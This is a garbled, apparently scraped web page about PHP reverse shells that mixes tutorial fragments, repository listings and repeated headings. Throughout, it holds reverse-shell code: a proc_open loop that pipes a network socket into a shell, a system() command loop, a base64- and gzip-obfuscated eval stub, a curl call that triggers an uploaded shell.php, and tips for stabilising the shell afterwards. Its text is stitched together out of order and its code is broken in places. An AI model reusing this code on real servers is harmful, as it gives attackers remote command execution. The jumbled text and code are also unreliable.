PHP provides multiple wrappers and system execution pathways to achieve a reverse shell. The method used often depends on the specific functions enabled on the target server's php.ini configuration. 1. The Single-Line Command Injection Payloads
: The simplest form for execution via a web browser: Use code with caution. Copied to clipboard
if (is_resource($process)) proc_close($process);
curl http://target.com/uploads/shell.php
A reverse shell is useless if the server cannot reach the internet. Reverse Shell Php
elseif (function_exists('system')) while ($cmd = fgets($sock)) ob_start(); system($cmd); fwrite($sock, ob_get_clean() . "\n");
Depending on the target environment, different PHP payloads can be used. Below are three common methods ranging from basic one-liners to robust scripts. 1. The Simple Single-Command Exec Method
Disclaimer: The following examples are provided strictly for educational purposes, authorized penetration testing, and security auditing.
$evalCode = gzinflate(base64_decode($payload)); $evalArguments = " ". $port." ". $ip; $tmpdir ="C:\\windows\\temp"; chdir($tmpdir) pentestmonkey/php-reverse-shell - GitHub PHP provides multiple wrappers and system execution pathways
Ensure window resizing works properly by setting the environment variables to match your local terminal size. Open a separate local terminal window, run stty size to find your rows and columns, and then execute the following inside your reverse shell:
To understand a reverse shell, you must first understand a bind shell.
Use code with caution. 2. Base64 Encoding Payloads
PHP reverse shells vary in complexity, from simple one-liners to feature-rich scripts: Dhayalanb/windows-php-reverse-shell - GitHub The Single-Line Command Injection Payloads : The simplest
php-reverse-shell * Resources. Readme. * Stars. 2.8k stars. * Watchers. 48 watching. * Forks. 1.9k forks. Reverse shell PHP with GET parameters - Stack Overflow
Use a whitelist of allowed file extensions (e.g., .jpg , .pdf ) rather than a blacklist.
You can download it from the Pentest Monkey GitHub repository .
Type reset and hit enter. If asked for a terminal type, enter xterm-256color .
array("pipe", "r"), // stdin 1 => array("pipe", "w"), // stdout 2 => array("pipe", "w") // stderr ); // Spawn the shell process $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) exit(1); // Make streams non-blocking stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($daemon, 0); while (1) // Check if the connection or the shell process has terminated if (feof($daemon)) break; if (feof($pipes[1])) break; $read_a = array($daemon, $pipes[1], $pipes[2]); $num_changed_streams = stream_select($read_a, $write_a, $error_a, null); // Read from network, write to shell stdin if (in_array($daemon, $read_a)) $input = fread($daemon, $chunk_size); fwrite($pipes[0], $input); // Read from shell stdout, write to network if (in_array($pipes[1], $read_a)) $input = fread($pipes[1], $chunk_size); fwrite($daemon, $input); // Read from shell stderr, write to network if (in_array($pipes[2], $read_a)) $input = fread($pipes[2], $chunk_size); fwrite($daemon, $input); fclose($daemon); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?> Use code with caution. Step-by-Step Implementation Guide